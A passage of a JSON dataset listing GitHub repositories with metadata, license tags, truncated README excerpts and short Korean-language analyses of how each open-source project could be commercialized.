it](https://fregante.github.io/webext-permission-toggle/?name=Refined%20GitHub&icon=https%3A%2F%2Fraw.githubusercontent.com%2Frefined-github%2Frefined-github%2Fmain%2Fsource%2Ficon.png). <!-- icon.png renders best -->\n\n*The GITHUB and REFINED GITHUB trademarks are owned by GitHub, Inc. and used under license.*\n\n## Install\n\n[link-chrome]: https://chrome.google.com/webstore/detail/refined-g","composite_score":0.0703,"license_safety_tag":"safe"},{"name":"ecomfe/san","github_url":"https://github.com/ecomfe/san","stars":23,"language":"JavaScript","license":"mit","abandonment_months":4,"description":"# San 저장소 분석\n\n## 왜 보물인가\n웹사이트나 앱을 만들 때 필요한 기본 뼈대를 제공하는 가볍고 빠른 도구로, 개발 속도를 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 스타트업이 빠르게 관리 대시보드나 데이터 분석 웹페이지를 구축하는 데 사용\n- **내부 업무 도구**: 중소기업의 직원이 사용하는 간단한 업무 관","readme_excerpt":"<p align=\"center\">\n    <a href=\"https://baidu.github.io/san/\">\n        <img src=\"https://baidu.github.io/san/img/logo-colorful.svg\" alt=\"Logo\" height=\"220\">\n    </a>\n</p>\n\n<h1 align=\"center\">SAN</h1>\n\n<p align=\"center\">\n一个快速、轻量、灵活的 JavaScript 组件框架\n<br>\nA fast, portable, flexible JavaScript component framework.\n</p>\n\n<p align=\"center\">\n  <a href=\"https://www.npmjs.com/package/san\"><img src=\"http://img.shields.io/npm/v/san.svg?style=flat-square\" alt=\"NPM version\"></a>\n  <a href=\"https://www.npmjs.com/package/san\"><img src=\"https://img.shields.io/github/license/baidu/san.svg?style=flat-square\" alt=\"License\"></a>\n  <a href=\"https://github.com/baidu/san/actions\"><img src=\"https://github.com/baidu/san/workflows/CI/badge.svg\" alt=\"Build Status\"></a>\n  <a href=\"https://coveralls.io/github/baidu/san?branch=master\"><img src=\"https://img.shields.io/coveralls/github/baidu/san.svg?style=flat-square\" alt=\"Coverage Status\"></a>\n  <a href=\"https://github.com/baidu/san/issues\"><img src=\"https://img.shi","composite_score":0.0701,"license_safety_tag":"safe"},{"name":"asciimoo/searx","github_url":"https://github.com/asciimoo/searx","stars":13,"language":"Python","license":"agpl-3.0","abandonment_months":0,"description":"# Searx 저장소 분석\n\n## 왜 보물인가\n누구나 자신의 검색 데이터를 제어할 수 있도록 만든 비영리 검색 엔진으로, 개인정보 보호를 원하는 사람들의 니즈를 정확히 해결합니다.\n\n## 어디에 쓸 수 있나\n1. **프라이빗 검색 SaaS**: 기업 직원들의 검색 활동을 회사 내부에서만 관리하는 폐쇄형 검색 서비스\n2. **학교/도서관 API**: 학생들이","readme_excerpt":".. SPDX-License-Identifier: AGPL-3.0-or-later\n\n======================\nIMPORTANT ANNOUNCEMENT\n======================\n\nI wanted to share a personal update with the community: I have shifted my\nactive development focus away from this project to a new search tool I\nhave been building called `Hister <https://github.com/asciimoo/hister>`_.\n\nWhy?\n----\n\nSearx is a metasearch engine, which means it is fundamentally dependent on\nthird-party search engines. This creates inherent limitations that are\ndifficult to solve within the current architecture:\n\n- Results are only as good as what upstream engines expose\n- Privacy guarantees are partial because requests still leave your machine\n- Relevance ranking is limited to what scraped results provide\n- There is no persistent memory of what you have already read or found useful\n\nHister takes a different approach. Instead of querying other engines, it\nindexes content you choose (web pages, local files, browser history) into a\nfully local, self-hosted ful","composite_score":0.07,"license_safety_tag":"risky"},{"name":"swimlane/ngx-datatable","github_url":"https://github.com/swimlane/ngx-datatable","stars":6,"language":"TypeScript","license":"mit","abandonment_months":0,"description":"# ngx-datatable 상용화 분석\n\n## 왜 보물인가\n웹 애플리케이션에서 대량의 데이터를 표 형태로 빠르고 깔끔하게 보여주는 핵심 도구로, 금융·의료·통계 플랫폼 같은 데이터 중심 서비스에 필수적입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 대시보드 서비스**\n- 기업 고객들의 판매 데이터, 사용자 통계를 한눈에 볼 수 있는 관리 화면 제공","readme_excerpt":"# ngx-datatable\n\n[![Join the chat at https://gitter.im/swimlane/ngx-datatable](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/swimlane/ngx-datatable?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n[![Code Climate](https://codeclimate.com/github/swimlane/ngx-datatable/badges/gpa.svg)](https://codeclimate.com/github/swimlane/ngx-datatable)\n[![Test Coverage](https://codeclimate.com/github/swimlane/ngx-datatable/badges/coverage.svg)](https://codeclimate.com/github/swimlane/ngx-datatable/coverage)\n[![npm version](https://badge.fury.io/js/%40swimlane%2Fngx-datatable.svg)](https://badge.fury.io/js/%40swimlane%2Fngx-datatable)\n[![npm downloads](https://img.shields.io/npm/dm/@swimlane/ngx-datatable.svg)](https://npmjs.org/@swimlane/ngx-datatable)\n\n`ngx-datatable` is an Angular component for presenting large and complex data. It has all the features you would expect from any other table but in a light package with _no external dependencies_. The table was","composite_score":0.07,"license_safety_tag":"safe"},{"name":"TomPallister/Ocelot","github_url":"https://github.com/TomPallister/Ocelot","stars":9,"language":"C#","license":"mit","abandonment_months":0,"description":"# Ocelot 저장소 분석\n\n## 왜 보물인가\n여러 서버로 흩어진 웹 서비스들을 하나의 문으로 통합 관리할 수 있는 중개 기술로, 대규모 서비스 운영 시 필수적인 인프라입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 여러 나라의 데이터센터에 분산된 마이크로서비스를 하나의 API로 통합하여 고객에게 제공\n- **내부 업무 도구**: 대기업의","readme_excerpt":"﻿![Ocelot Logo](https://raw.githubusercontent.com/ThreeMammals/Ocelot/refs/heads/assets/images/ocelot_logo.png)\r\n\r\n[![Release Status](https://github.com/ThreeMammals/Ocelot/actions/workflows/release.yml/badge.svg)](https://github.com/ThreeMammals/Ocelot/actions/workflows/release.yml)\r\n[![Development Status](https://github.com/ThreeMammals/Ocelot/actions/workflows/develop.yml/badge.svg)](https://github.com/ThreeMammals/Ocelot/actions/workflows/develop.yml)\r\n[![ReadTheDocs](https://readthedocs.org/projects/ocelot/badge/?version=develop&style=flat-square)](https://app.readthedocs.org/projects/ocelot/builds/?version__slug=develop)\r\n[![coveralls](https://img.shields.io/coveralls/github/ThreeMammals/Ocelot/develop?label=coveralls&logo=coveralls&logoColor=white)](https://coveralls.io/github/ThreeMammals/Ocelot?branch=develop)\r\n[![codecov](https://codecov.io/gh/ThreeMammals/Ocelot/branch/develop/graph/badge.svg)](https://codecov.io/gh/ThreeMammals/Ocelot)\r\n[![License: MIT](https://img.shields.","composite_score":0.07,"license_safety_tag":"safe"},{"name":"CachetHQ/Cachet","github_url":"https://github.com/CachetHQ/Cachet","stars":6,"language":"PHP","license":"NOASSERTION","abandonment_months":1,"description":"# Cachet 저장소 분석\n\n## 왜 보물인가\n웹사이트나 서비스가 잘 작동하는지 실시간으로 고객들에게 알려주는 상태 공지판 시스템입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 스토리지 회사가 서버 점검 시간을 고객에게 미리 공지하는 대시보드\n2. **내부 업무 도구**: IT팀이 회사 내부 시스템 장애를 직원들에게 실시간으로 ","readme_excerpt":"<p align=\"center\">\n    <picture>\n      <source media=\"(prefers-color-scheme: dark)\" srcset=\"https://cachethq.io/assets/cachet-logo-dark.svg\">\n      <img alt=\"Cachet Logo\" src=\"https://cachethq.io/assets/cachet-logo-light.svg\">\n    </picture>\n</p>\n\nCachet, the open-source self-hosted status page system.\n\n## Cachet 3.x Announcement\n\nFor more information on the Cachet rebuild and our plans for 3.x, you can read the announcement [here](https://github.com/CachetHQ/Cachet/discussions/4342).\n\n## Requirements\n\n- PHP 8.2 or later\n- [Composer](https://getcomposer.org)\n- A supported database: MariaDB, MySQL, PostgreSQL or SQLite\n\n## Installation, Upgrades and Documentation\n\nYou can find documentation at [https://docs.cachethq.io](https://docs.cachethq.io).\n\nHere are some useful quick links:\n\n- [Installing Cachet](https://docs.cachethq.io/v3.x/installation)\n\n### Demo\n\nTo test out the v3 demo, you can log in to the [Cachet dashboard](https://v3.cachethq.io/dashboard) with the following credentials:","composite_score":0.07,"license_safety_tag":"unknown"},{"name":"CanopyTax/single-spa","github_url":"https://github.com/CanopyTax/single-spa","stars":16,"language":"JavaScript","license":"NOASSERTION","abandonment_months":3,"description":"# CanopyTax/single-spa 분석 보고서\n\n## 왜 보물인가\n웹 애플리케이션을 여러 개의 작은 독립적인 프로그램으로 나누어 관리할 수 있게 해주는 기술로, 대규모 웹서비스의 개발 속도와 안정성을 크게 높입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 금융·회계 소프트웨어에서 여러 팀이 동시에 각각의 기능(세금 계산, 보고서 ","readme_excerpt":"<img src=\"https://github.com/single-spa/single-spa/assets/5524384/7b1b642d-53d1-409a-b992-e77495bcf631\" height=\"40\">\n\n[![npm version](https://img.shields.io/npm/v/single-spa.svg?style=flat-square)](https://www.npmjs.org/package/single-spa)\n[![](https://data.jsdelivr.com/v1/package/npm/single-spa/badge)](https://www.jsdelivr.com/package/npm/single-spa)\n[![NPM Downloads](https://badgen.net/npm/dm/single-spa)](https://npmjs.org/package/single-spa)\n\n# single-spa\n\n[Join the chat on Slack](https://join.slack.com/t/single-spa/shared_invite/zt-2uvhef42o-g4H3mvKDaenE9xVAewBKww)\n\n[Donate to this project](https://opencollective.com/single-spa)\n\n[Official educational courses](https://single-spa-workshop.com)\n\n[Official single-spa hosting](https://baseplate.cloud)\n\n<div>\n  <a href=\"https://single-spa-workshop.com\">\n    <img height=\"50\" alt=\"single-spa-workshop-logo\" src=\"https://github.com/user-attachments/assets/9d485d9a-63d9-4eba-9c53-bc68718806e1\">\n  </a>\n</div>\n\n<div>\n  <a href=\"https://basepla","composite_score":0.0699,"license_safety_tag":"unknown"},{"name":"gregberge/svgr","github_url":"https://github.com/gregberge/svgr","stars":8,"language":"TypeScript","license":"MIT","abandonment_months":3,"description":"# SVGR 상품화 분석\n\n## 왜 보물인가\n그림 파일을 웹사이트에서 쉽게 사용할 수 있도록 자동으로 변환해주는 도구로, 웹 개발자들의 반복 작업을 크게 줄여줍니다.\n\n## 어디에 쓸 수 있나\n\n1. **디자인 협업 SaaS**: 디자이너가 만든 그림을 개발자가 웹사이트에 바로 적용할 수 있는 자동 변환 플랫폼\n2. **내부 업무 도구**: 대규모 웹 서비","readme_excerpt":"<h1 align=\"center\">\n  <img src=\"https://raw.githubusercontent.com/gregberge/svgr/master/resources/svgr-logo.png\" alt=\"svgr\" title=\"svgr\" width=\"300\">\n</h1>\n<p align=\"center\" style=\"font-size: 1.2rem;\">Transform SVGs into React components 🦁</p>\n\n[![License](https://img.shields.io/npm/l/@svgr/core.svg)](https://github.com/gregberge/svgr/blob/master/LICENSE)\n[![Donate](https://opencollective.com/svgr/backers/badge.svg)](https://opencollective.com/svgr/donate)\n[![npm package](https://img.shields.io/npm/v/@svgr/core/latest.svg)](https://www.npmjs.com/package/@svgr/core)\n[![npm downloads](https://img.shields.io/npm/dm/@svgr/core.svg)](https://www.npmjs.com/package/@svgr/core)\n[![CI](https://github.com/gregberge/svgr/actions/workflows/ci.yml/badge.svg)](https://github.com/gregberge/svgr/actions/workflows/ci.yml)\n[![Code Coverage](https://img.shields.io/codecov/c/github/gregberge/svgr.svg)](https://codecov.io/github/gregberge/svgr)\n\n[**Try it out online!**](https://react-svgr.com/playground)\n\n","composite_score":0.0697,"license_safety_tag":"safe"},{"name":"rootsecdev/Azure-Red-Team","github_url":"https://github.com/rootsecdev/Azure-Red-Team","stars":9,"language":"PowerShell","license":"unknown","abandonment_months":3,"description":"# Azure-Red-Team 상용화 분석\n\n## 왜 보물인가\n클라우드 보안 감시 전문가들이 자신의 시스템 안전성을 실제로 테스트할 수 있는 도구로, 기업의 사이버 보안 투자 효과를 검증하는 데 필수적입니다.\n\n## 어디에 쓸 수 있나\n\n1. **클라우드 보안 진단 SaaS**: 기업이 로그인하면 자동으로 자신의 클라우드 시스템 약점을 찾아주고 개선 방안을","readme_excerpt":"# Microsoft Cloud Red Team\n### Disclaimer\nThe original source of this repository started from the Swisskyrepo. Over time I have slowly added other content in from my own Cloud Penetration Testing experience or other publicly available sources, blogs...etc. Some of the content in here has not been updated in several years. Similar content may appear in training courses. Under no circumstances has this repository reproduced the content of paid training.      \n\n### Original Repo Sources\nhttps://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20Azure%20Pentest.md\n\n(New Location):https://swisskyrepo.github.io/InternalAllTheThings/\n\n## Azure Training Courses\n\n[Altered Security: Attack & Defend Azure](https://www.alteredsecurity.com/azureadlab)\n\n\n\n## Free Training\n\n[Webcast: OPSEC Fundamentals for Remote Red Teams](https://www.blackhillsinfosec.com/webcast-opsec-fundamentals-for-remote-red-teams/)\n\n[EDITED EDITION — Getting Started in Pentesting","composite_score":0.0695,"license_safety_tag":"unknown"},{"name":"searx/searx","github_url":"https://github.com/searx/searx","stars":5,"language":"Python","license":"AGPL-3.0","abandonment_months":0,"description":"# Searx/Searx 저장소 분석\n\n## 왜 보물인가\n구글, 네이버 같은 대형 검색사이트에 의존하지 않고 개인정보 보호를 중시하는 사람들이 직접 운영할 수 있는 검색 플랫폼입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개인정보 보호가 중요한 기업·기관을 위한 '프라이빗 검색 엔진' 구독 서비스\n2. **내부 업무 도구**: 대학, 도","readme_excerpt":".. SPDX-License-Identifier: AGPL-3.0-or-later\n\n======================\nIMPORTANT ANNOUNCEMENT\n======================\n\nI wanted to share a personal update with the community: I have shifted my\nactive development focus away from this project to a new search tool I\nhave been building called `Hister <https://github.com/asciimoo/hister>`_.\n\nWhy?\n----\n\nSearx is a metasearch engine, which means it is fundamentally dependent on\nthird-party search engines. This creates inherent limitations that are\ndifficult to solve within the current architecture:\n\n- Results are only as good as what upstream engines expose\n- Privacy guarantees are partial because requests still leave your machine\n- Relevance ranking is limited to what scraped results provide\n- There is no persistent memory of what you have already read or found useful\n\nHister takes a different approach. Instead of querying other engines, it\nindexes content you choose (web pages, local files, browser history) into a\nfully local, self-hosted ful","composite_score":0.0695,"license_safety_tag":"risky"},{"name":"didi/nightingale","github_url":"https://github.com/didi/nightingale","stars":7,"language":"Go","license":"Apache-2.0","abandonment_months":0,"description":"# didi/nightingale 상용화 분석\n\n## 왜 보물인가\n야간 모니터링이나 알림 기능이 필요한 회사들이 직접 구축하지 않고 사용할 수 있는 준비된 솔루션입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 중소 IT회사의 서버 상태를 24시간 감시하고 문제 발생 시 자동으로 담당자에게 알려주는 모니터링 플랫폼\n- **내부 업무 도구**:","readme_excerpt":"<p align=\"center\">\n  <a href=\"https://github.com/ccfos/nightingale\">\n    <img src=\"doc/img/Nightingale_L_V.png\" alt=\"nightingale - cloud native monitoring\" width=\"100\" /></a>\n</p>\n<p align=\"center\">\n  <b>Open-Source Alerting Expert</b>\n</p>\n\n<p align=\"center\">\n<a href=\"https://flashcat.cloud/docs/\">\n  <img alt=\"Docs\" src=\"https://img.shields.io/badge/docs-get%20started-brightgreen\"/></a>\n<a href=\"https://hub.docker.com/u/flashcatcloud\">\n  <img alt=\"Docker pulls\" src=\"https://img.shields.io/docker/pulls/flashcatcloud/nightingale\"/></a>\n<a href=\"https://github.com/ccfos/nightingale/graphs/contributors\">\n  <img alt=\"GitHub contributors\" src=\"https://img.shields.io/github/contributors-anon/ccfos/nightingale\"/></a>\n<img alt=\"GitHub Repo stars\" src=\"https://img.shields.io/github/stars/ccfos/nightingale\">\n<img alt=\"GitHub forks\" src=\"https://img.shields.io/github/forks/ccfos/nightingale\">\n<br/><img alt=\"GitHub Repo issues\" src=\"https://img.shields.io/github/issues/ccfos/nightingale\">\n<img alt","composite_score":0.0694,"license_safety_tag":"safe"},{"name":"alexreisner/geocoder","github_url":"https://github.com/alexreisner/geocoder","stars":5,"language":"Ruby","license":"mit","abandonment_months":2,"description":"# Geocoder 저장소 분석\n\n## 왜 보물인가\n주소를 입력하면 지도상의 정확한 위치(위도, 경도)로 변환해주는 기술로, 배달앱·부동산·물류 등 위치 기반 서비스가 필요한 모든 비즈니스의 핵심 인프라입니다.\n\n## 어디에 쓸 수 있나\n- **배달/쇼핑 플랫폼**: 사용자 주소 입력 → 자동 위치 확인 → 배송 시간·비용 계산\n- **부동산 정보 서비스*","readme_excerpt":"Geocoder\n========\n\n**Complete geocoding solution for Ruby.**\n\n[![Gem Version](https://badge.fury.io/rb/geocoder.svg)](http://badge.fury.io/rb/geocoder)\n\nKey features:\n\n* Forward and reverse geocoding.\n* IP address geocoding.\n* Connects to more than 40 APIs worldwide.\n* Performance-enhancing features like caching.\n* Integrates with ActiveRecord and Mongoid.\n* Basic geospatial queries: search within radius (or rectangle, or ring).\n\nCompatibility:\n\n* Ruby versions: 2.5+ and JRuby.\n* Databases: MySQL, PostgreSQL, SQLite, and MongoDB.\n* Rails: 5.x, 6.x, 7.x and 8.x.\n* Works outside of Rails with the `json` (for MRI) or `json_pure` (for JRuby) gem.\n\n\nTable of Contents\n-----------------\n\nBasic Features:\n\n* [Basic Search](#basic-search)\n* [Geocoding Objects](#geocoding-objects)\n* [Geospatial Database Queries](#geospatial-database-queries)\n* [Geocoding HTTP Requests](#geocoding-http-requests)\n* [Geocoding Service (\"Lookup\") Configuration](#geocoding-service-lookup-configuration)\n\nAdvanced Featu","composite_score":0.0692,"license_safety_tag":"safe"},{"name":"iridakos/duckrails","github_url":"https://github.com/iridakos/duckrails","stars":6,"language":"Ruby","license":"mit","abandonment_months":6,"description":"# DuckRails 저장소 분석\n\n## 왜 보물인가\n복잡한 프로그래밍 없이 웹 서비스의 테스트 환경을 빠르게 만들 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n- **내부 업무 도구**: 소프트웨어 개발팀이 새로운 기능을 테스트할 때 가짜 서버를 빠르게 구성\n- **API 판매**: 개발사가 고객에게 API를 판매하기 전에 안정성을 테스트하는 모의 환","readme_excerpt":"# Note\n\n⚠️ **Project Status: No Longer Maintained**\n\nThis repository is no longer maintained.\nThe code is preserved here for archival and reference purposes only.\n\nNo features or bug fixes will be added.\n\nIssues and pull requests may not receive responses.\n\nFeel free to fork the project if you’d like to continue development.\n\nThank you to everyone who has used or contributed to this project!\n\n\n# DuckRails [![GitHub version](https://badge.fury.io/gh/iridakos%2Fduckrails.svg?a=5)](https://badge.fury.io/gh/iridakos%2Fduckrails?a=5) [![Build Status](https://travis-ci.org/iridakos/duckrails.svg?branch=master)](https://travis-ci.org/iridakos/duckrails)\n\nDuckRails is a development tool.\n\nIts main purpose is to allow developers to quickly mock API endpoints that for many possible reasons they can't reach at a specific time.\n\n> If it looks like a duck, walks like a duck and quacks like a duck, then it's a duck :duck:\n\n![Home Page](https://github.com/iridakos/duckrails/blob/master/documentation/","composite_score":0.0692,"license_safety_tag":"safe"},{"name":"nomiclabs/hardhat","github_url":"https://github.com/nomiclabs/hardhat","stars":7,"language":"TypeScript","license":"NOASSERTION","abandonment_months":0,"description":"# Hardhat 저장소 분석\n\n## 왜 보물인가\n블록체인 기술을 이용한 스마트 계약(자동 실행 프로그램) 개발과 테스트를 쉽게 만들어주는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **암호화폐 거래소**: 블록체인 기반 거래 시스템의 안정성 검증 및 관리 도구로 제공\n2. **금융회사 개발팀**: 내부적으로 블록체인 기술 실험 및 프로토타입 개발을 위한","readme_excerpt":"![](https://raw.githubusercontent.com/NomicFoundation/hardhat/main/img/hardhat-header.png)\n\nHardhat is an Ethereum development environment for professionals. It facilitates performing frequent tasks, such as running tests, automatically checking code for mistakes or interacting with smart contracts.\n\nBuilt by the [Nomic Foundation](https://nomic.foundation/) for the Ethereum community.\n\n---\n\n> 💡 This is the README for Hardhat 3, the new major version of Hardhat. For the previous version (v2), see [this branch](https://github.com/NomicFoundation/hardhat/tree/v2) instead.\n\n---\n\n## Getting started\n\nTo install Hardhat and initialize a new project, run the following command in an empty directory:\n\n```bash\nnpx hardhat --init\n```\n\nThis will take you through an interactive setup process to get started.\n\n## Learn more\n\nTo learn more about Hardhat, check out the [documentation](https://hardhat.org/docs/).\n\n## Contributing\n\nContributions are always welcome! Feel free to open any issue or send a p","composite_score":0.0689,"license_safety_tag":"unknown"},{"name":"bytedance/bhook","github_url":"https://github.com/bytedance/bhook","stars":18,"language":"C","license":"MIT","abandonment_months":3,"description":"# ByteDance bhook 상용화 분석\n\n## 왜 보물인가\n애플리케이션 실행 흐름을 중간에 가로채서 동작을 변경하거나 모니터링할 수 있는 핵심 기술로, 소프트웨어 보안·성능 최적화·디버깅 시장에서 널리 필요한 기반 기술입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS - 성능 모니터링 서비스**\n개발자의 애플리케이션 성능을 실시간으로 감시하고 병","readme_excerpt":"# ByteHook\n\n![](https://img.shields.io/badge/license-MIT-brightgreen.svg?style=flat)\n![](https://img.shields.io/badge/release-1.1.1-red.svg?style=flat)\n![](https://img.shields.io/badge/Android-4.1%20--%2015-blue.svg?style=flat)\n![](https://img.shields.io/badge/arch-armeabi--v7a%20%7C%20arm64--v8a%20%7C%20x86%20%7C%20x86__64-blue.svg?style=flat)\n\n[**简体中文**](README.zh-CN.md)\n\n**ByteHook** is an Android PLT hook library which supports armeabi-v7a, arm64-v8a, x86 and x86_64.\n\nByteHook is now used in TikTok, Douyin, Toutiao, Xigua Video, Lark.\n\nIf you need an Android inline hook library, please move to [ShadowHook](https://github.com/bytedance/android-inline-hook).\n\n\n## Features\n\n* Support Android 4.1 - 15 (API level 16 - 35).\n* Support armeabi-v7a, arm64-v8a, x86 and x86_64.\n* Multiple hooks and unhooks for the same function do not conflict with each other.\n* Hook a single, partial or all of the dynamic libraries in the process.\n* Hook the newly loaded dynamic libraries automatically.\n* Av","composite_score":0.0687,"license_safety_tag":"safe"},{"name":"butomo1989/docker-android","github_url":"https://github.com/butomo1989/docker-android","stars":6,"language":"Python","license":"NOASSERTION","abandonment_months":0,"description":"# docker-android 저장소 분석\n\n## 왜 보물인가\n안드로이드 앱을 클라우드 서버에서 자동으로 테스트하고 배포할 수 있게 해주는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **모바일 앱 자동 테스트 SaaS**: 개발사들이 앱 출시 전 버그를 빠르게 찾을 수 있는 온라인 서비스\n2. **앱 스토어 자동 배포 도구**: 여러 안드로이드 폰 ","readme_excerpt":"\n<p align=\"center\">\n  <img id=\"header\" src=\"./images/logo_docker-android.png\" />\n</p>\n\n[![Paypal Donate](https://img.shields.io/badge/paypal-donate-blue.svg)](http://paypal.me/budtmo) [![PRs Welcome](https://img.shields.io/badge/PRs-welcome-brightgreen.svg?style=flat-square)](http://makeapullrequest.com) [![codecov](https://codecov.io/gh/budtmo/docker-android/branch/master/graph/badge.svg)](https://codecov.io/gh/budtmo/docker-android) [![Join the chat at https://gitter.im/budtmo/docker-android](https://badges.gitter.im/budtmo/docker-android.svg)](https://gitter.im/budtmo/docker-android?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge) [![GitHub release](https://img.shields.io/github/release/budtmo/docker-android.svg)](https://github.com/budtmo/docker-android/releases)\n\nDocker-Android is a docker image built to be used for everything related to Android. It can be used for Application development and testing (native, web and hybrid-app).\n\nAdvantages of using this","composite_score":0.0686,"license_safety_tag":"unknown"},{"name":"gita/bhagavad-gita-api","github_url":"https://github.com/gita/bhagavad-gita-api","stars":8,"language":"Python","license":"MIT","abandonment_months":4,"description":"# Bhagavad Gita API 사업화 분석\n\n## 왜 보물인가\n종교 문헌을 쉽게 검색하고 활용할 수 있도록 정리한 데이터베이스로, 영성 콘텐츠 시장에서 핵심 인프라가 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **영성 학습 플랫폼**: 명상·요가·힌두교 교육 앱이 이 API를 통해 경전 내용을 자동으로 제공\n2. **종교 커뮤니티 앱**: 신","readme_excerpt":"<!-- markdownlint-disable -->\n<p align=\"center\">\n  <a href=\"https://bhagavadgita.io\">\n    <img src=\"https://raw.githubusercontent.com/gita/bhagavad-gita-api/main/.github/gita.png\" alt=\"Logo\" width=\"300\">\n  </a>\n\n  <h3 align=\"center\">Bhagavad Gita API</h3>\n\n  <p align=\"center\">\n    Code for the BhagavadGita.io API, which is an app built for Gita readers by Gita readers.\n    <br />\n    <br />\n    <img alt=\"GitHub issues\" src=\"https://img.shields.io/github/issues/gita/bhagavad-gita-api\">\n    <img alt=\"PyPI - Python Version\" src=\"https://img.shields.io/pypi/pyversions/bhagavad-gita-api\">\n      <a href=\"https://github.com/gita/bhagavad-gita-api/blob/master/LICENSE\">\n    <img alt=\"LICENSE\" src=\"https://img.shields.io/badge/License-MIT-yellow.svg?maxAge=43200\">\n  </a>\n  <a href=\"https://github.com/gita/bhagavad-gita-api/actions/workflows/deploy.yml\"><img alt=\"Stars\" src=\"https://github.com/gita/bhagavad-gita-api/actions/workflows/deploy.yml/badge.svg\"></a>\n  <a href=\"https://api.bhagavadgita.","composite_score":0.0682,"license_safety_tag":"safe"},{"name":"java-native-access/jna","github_url":"https://github.com/java-native-access/jna","stars":5,"language":"Java","license":"NOASSERTION","abandonment_months":0,"description":"# JNA (Java Native Access) 저장소 분석\n\n## 왜 보물인가\n자바 프로그램에서 윈도우, 맥, 리눅스 같은 운영체제의 기본 기능을 직접 사용할 수 있게 해주는 핵심 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 클라우드 기반 파일 관리 도구가 운영체제의 파일 보호 기능을 직접 제어하여 더 안전한 서비스 제공\n2. ","readme_excerpt":"![Java Native Access - JNA](https://github.com/java-native-access/jna/raw/master/www/images/jnalogo.jpg \"Java Native Access - JNA\")\n\n[![Github Actions Build Status](https://github.com/java-native-access/jna/workflows/Java%20CI/badge.svg)](https://github.com/java-native-access/jna/actions?query=workflow%3A%22Java+CI%22)\n[![Travis Build Status](https://api.travis-ci.com/java-native-access/jna.svg?branch=master)](https://travis-ci.com/github/java-native-access/jna)\n[![Appveyor Build Status](https://ci.appveyor.com/api/projects/status/j6vmpjrw5iktb8iu/branch/master?svg=true)](https://ci.appveyor.com/project/dblock/jna-gsxuq/branch/master)\n\nJava Native Access (JNA)\n========================\n\nThe definitive JNA reference (including an overview and usage details) is in the [JavaDoc](http://java-native-access.github.io/jna/5.18.1/javadoc/).  Please read the [overview](http://java-native-access.github.io/jna/5.18.1/javadoc/overview-summary.html#overview_description).  Questions, comments, or exp","composite_score":0.0681,"license_safety_tag":"unknown"},{"name":"SamSchott/maestral","github_url":"https://github.com/SamSchott/maestral","stars":26,"language":"Python","license":"MIT","abandonment_months":3,"description":"# Maestral 저장소 분석\n\n## 왜 보물인가\n클라우드 저장소(드롭박스 같은)를 자동으로 동기화해주는 가벼운 프로그램으로, 기존 공식 앱보다 적은 컴퓨터 자원을 써서 더 빠르고 효율적입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 기업용 파일 동기화 솔루션으로 제공 - 회사 직원들이 구독해서 자신의 컴퓨터와 클라우드를 자동으로 연결","readme_excerpt":"[![PyPi Release](https://img.shields.io/pypi/v/maestral.svg)](https://pypi.org/project/maestral/)\n[![Pyversions](https://img.shields.io/pypi/pyversions/maestral.svg)](https://pypi.org/pypi/maestral/)\n[![Documentation Status](https://readthedocs.org/projects/maestral/badge/?version=latest)](https://maestral.readthedocs.io/en/latest/?badge=latest)\n[![codecov](https://codecov.io/gh/SamSchott/maestral/branch/master/graph/badge.svg?token=V0C7IQ1MAU)](https://codecov.io/gh/SamSchott/maestral)\n\n# Maestral <img src=\"https://raw.githubusercontent.com/SamSchott/maestral/master/src/maestral/resources/maestral.png\" align=\"right\" title=\"Maestral\" width=\"110\" height=\"110\">\n\nA light-weight and open-source Dropbox client for macOS and Linux.\n\n## About\n\nMaestral is an open-source Dropbox client written in Python. The project's main goal is to\nprovide a client for platforms and file systems that are no longer directly supported by\nDropbox.\n\nMaestral currently does not support Dropbox Paper, the manageme","composite_score":0.0678,"license_safety_tag":"safe"},{"name":"awangdev/LintCode","github_url":"https://github.com/awangdev/LintCode","stars":7,"language":"Java","license":"unknown","abandonment_months":6,"description":"# awangdev/LintCode 분석 보고서\n\n## 왜 보물인가\n프로그래밍 문제 풀이 플랫폼인 LintCode의 학습 자료를 체계적으로 정리해둔 저장소로, 개발자 교육 시장에서 고수익 콘텐츠로 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 개발자 온라인 학습 SaaS**\n- 프로그래밍 문제 풀이 플랫폼을 운영하며 월 구독료로 수익화 (초급자","readme_excerpt":"> Disclaimer: 这里的题目跟具体的面试毫无关系, 也没有任何指向性; 这些题目是我当年在努力刷题的过程中积累下来的经验和总结!\n\n# 简介\n这个站点已经开启超过7年, 很高兴它可以帮到有需要的人. 信息有价, 知识无价, 每逢闲暇, 我会来维护这个repo, 给刷题的朋友们一些我的想法和见解. 下面来简单介绍一下:\n- **README.md**: 所有所做过的题目\n- **ReviewPage.md**: 所有题目的总结和归纳（不断完善中）\n- **KnowledgeHash2.md**: 对所做过的知识点的一些笔记\n- **SystemDesign.md**: 对系统设计的一些笔记\n\n# Java Algorithm Problems\n\n| Leetcode# | Problem     | Level  | Tags | Time | Space | Language | Sequence |\n|:---------:|:------------|:------:|:----:|-----:|------:|:--------:|---------:|\n|N/A|[Jump Game II.java](https://github.com/awangdev/LintCode/blob/master/Java/Jump%20Game%20II.java)|Hard|[Array, Coordinate DP, DP, Greedy]|O(n)|O(1)|Java|0|\n|N/A|[Majority Number 